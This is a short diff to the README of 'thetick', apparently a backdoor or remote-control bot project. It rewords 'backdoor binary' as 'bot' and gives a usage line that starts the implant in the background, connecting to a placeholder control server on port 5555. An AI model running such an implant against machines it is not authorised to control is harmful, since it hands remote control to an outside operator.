MarioVilas/thetick/README.md

 ## Usage

-To run the backdoor binary on the target platform, set the control server hostname and port as command line options.
+To run the bot on the target platform, set the control server hostname and port as command line options.
 For example:

 ```
 ./ticksvc control.example-domain.com 5555 &